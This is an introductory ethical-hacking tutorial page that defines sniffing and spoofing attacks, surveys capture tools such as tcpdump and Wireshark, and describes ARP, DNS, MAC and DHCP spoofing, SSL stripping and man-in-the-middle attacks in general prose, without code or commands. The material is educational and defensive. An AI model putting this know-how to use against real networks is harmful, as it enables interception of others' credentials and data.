Ethical Hacking Tutorial

What Are Sniffing and Spoofing? Meaning, Difference, Types of Spoofing & Sniffing Attack


What is a sniffing and spoofing attack in cyber security? What are the different types of sniffing and spoofing attacks? What is the difference between spoofing and sniffing attacks?

In this write-up, you will find answers to all your questions in simple terms. These are some of the major types of hacking attacks that can disrupt not only individuals but also businesses.

Hence, you must know the meaning of a sniffing attack as well as what is spoofing attack is. As part of our comprehensive Ethical Hacking Tutorial for Beginners, we have covered it in detail here.

What is Sniffing Attack in Cyber Security?

When hackers view and gather the data flowing in a network, it is called a sniffing attack. It can be used to see passwords, account details, email traffic, telnet traffic, etc.

This technique is also used by the admins of a network or system to find and troubleshoot traffic. 

For details on what is networking and its types, check the linked write-up.

What is Sniffing? | How an Attacker Hacks the Network using Sniffers?

In this video, We are explaining What is Sniffing? | How an Attacker Hacks the Network using Sniffers? Please do watch the complete video for in-depth information.

What Are Types of Sniffing Attack?

Now that you know the meaning of a sniffing attack, let’s know the different types of it.

1. Active Sniffing

When the sniffing is done on a switch-based network or a point-to-point network, it is called active sniffing. Here, the hackers can lock and monitor the traffic, as well as modify it by injecting address resolution packets (ARP).

2. Passive Sniffing

When the sniffing is done through a hub, then the traffic goes through a non-switched network. It is called passive sniffing. The interaction of the hackers takes place at the data link layer.

Important Things to Know About Sniffing Attack in Cyber Security

Given below are some important concepts of Sniffing in cyber security:

1. Packet Capture

Packet Capture is a tool used for maintaining the security and efficiency of a network. It helps in reviewing and analyzing the IP packets and examining the network traffic to detect security threats. 

Hackers use packet capturing to find confidential information, such as usernames and passwords. This can be performed without leaving traces for investigation. 

2. tcpdump

Tcpdump is software used to analyze data network packets to see TCP/IP and relevant packets flowing over a network. 

It supports most of the UNIX operating systems, including Linux, FreeBSD, Solaris, NetBSD, macOS, OpenWrt, AIX, etc. Hackers can use tcpdump to see usernames, passwords, URLs, and web content transmitting over unencrypted traffic. 

3. tshark

It is a network protocol analyzer tool that helps in capturing or reading packets of data on a network. The operation of tshark is similar to tcpdump. The native capture file format for tshark is pcapng. It uses the pcap library for data capture. 

4. Wireshark

Wireshark is a prominent tool for network protocol analysis. Network admins and ethical hackers use Wireshark to monitor the activities on a network and perform in-depth analysis. 

It supports most of operating systems, including Windows, Linux, Solaris, macOS, NetBSD, etc.

What is Spoofing Attack in Cyber Security?

Spooring attacks are those where the attackers look like a trusted person or company and use tricks to gain unauthorized access to data, spread malware, and do other harm. 

For example, if an organization is using Office 365 for team productivity, the attackers can send emails with similar domain names, like, and trick the users to click the link in the email.

What Are Different Types of Spoofing Attacks?

So far, we have covered what is sniffing and spoofing in cyber security. Now, it’s time to know about the different types of spoofing attacks.

1. ARP Spoofing

ARP stands for Address Resolution Protocol. In this type of spoofing, the hackers send fake ARP messages on a LAN. It helps them to connect their MAC address to the IP address of the network server. Once done, they can send and receive data meant for that IP address, steal the data, modify it, and launch more attacks. 

2. DNS Spoofing

DNS spoofing attacks take place when hackers modify the DNS records of a website or web application, and the traffic coming to that site is redirected to an illegitimate website. 

When users try to sign up or log in to their accounts using credentials, the hackers collect this sensitive information and use it for malicious purposes. Moreover, they can install malware on the targeted website. 

3. SSL Stripping

SSL Stripping is the technique of removing the security practices from the website that comes from using an SSL certificate. The HTTPS website is moved to HTTP, which allows hackers to monitor the traffic and data transmitted between the browsers and the web server. 

4. MAC Attacks

In MAC spoofing attacks, the hackers monitor and hunt the network to find original MAC addresses. After doing it, they pose as one of the original MAC addresses in the network. 

Using this technique, they can bypass several authentications and steal sensitive data and information, like apps in use, host IP addresses, etc.

5. DHCP Flooding

DHCP flooding happens when hackers send tons of requests to a DHCP server using all the IP addresses that can be issued by the server.

When this flooding occurs, there comes an instance when the server becomes unable to issue any IP address. It leads to denial of service (DoS) attacks and disables new users from accessing the network. 

6. DHCP Rogue

DHCP rogue is a server that is set up by a hacker on a network. However, the DHCP rogue server can’t be controlled by the administrator of the network. Hence, the network admins are not aware of the harm that the attackers can cause to the network using the DHCP capabilities the rogue server has. 

Attackers generally use such servers to launch man-in-the-middle attacks, sniffing, and reconnaissance attacks on the network.

7. MITM Attack

MITM stands for man in the middle. The MITM attacks are those when the attacker positions himself between the communication going on between a server and the user. Hence, he becomes the man in the middle of communication. 

The aim of doing this is to eavesdrop on the communication or try to impersonate one of the parties to steal confidential data, login details, bank account information, etc.

The information stolen can be used to cause financial loss to the users, identity theft, and change passwords.

Using Wireshark for Sniffing

Wireshark is a popular tool used for packet sniffing and analysis. It is used to capture the traffic on a local network and save the data to be analyzed in offline mode. The local network traffic can be on Bluetooth, LAN, Ethernet, Token Ring, etc. 

Hackers can use Wireshark to sniff the network traffic between IP addresses. They can apply relevant filters to see and analyze the traffic to be traced. 

While using Wireshark, it shows the list of the networks that can be sniffed. By using the filters, hackers can sniff specific traffic. After selecting the network traffic, they can capture the data flowing between the devices.

Did you find this article helpful?